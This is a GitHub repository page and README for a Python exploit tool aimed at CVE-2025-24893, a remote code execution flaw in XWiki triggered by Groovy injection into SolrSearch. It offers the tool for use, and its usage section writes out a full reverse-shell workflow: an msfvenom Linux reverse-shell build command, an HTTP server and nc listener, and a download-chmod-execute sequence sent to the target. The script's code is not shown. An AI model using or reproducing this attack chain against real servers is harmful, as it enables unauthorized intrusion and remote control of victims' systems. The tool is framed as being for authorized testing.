Skip to content

Infinit3i/CVE-2025-24893

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

20 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

XWiki CVE-2025-24893 Proof of Concept

Authors: Net.Doge & Infinit3i


CVE-2025-24893 Picture



Twitter Follow


This Python script exploits CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

πŸ“Œ Features

  • Single command execution via Groovy injection
  • Automatic reverse shell payload generation (with msfvenom)
  • Option to customize:
    • Remote target
    • Local IP address
    • HTTP server port
    • Reverse shell beacon port
  • Clean bash payload previews
  • ANSI color-coded interactive TUI

πŸš€ Usage

  1. Clone or download the script.

  2. Make sure you have the following installed:

    • msfvenom from Metasploit
    • Python 3
    • jq (used in the bash payloads)
  3. Run the script:

python3 CVE-2025-24893-PoC.py
  1. Select from the menu:

    • Run Command – Execute any shell command remotely.
    • Reverse Shell – Generate and deploy an ELF reverse shell to the target.
    • Change Settings – Modify LHOST, RHOST, server port, or beacon port.

πŸ§ͺ Reverse Shell Workflow

  1. Payload is generated:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. You are prompted to start a Python HTTP server and netcat listener:
python3 -m http.server 8080
nc -lvnp 31337
  1. The script sends the following sequence to the target:

    • Download payload
    • Make it executable
    • Execute the binary

⚠️ Disclaimer

This tool is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

πŸ“„ Reference

About

PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

Topics

Resources

Stars

Watchers

Forks

Packages

 
 
 

Contributors

Languages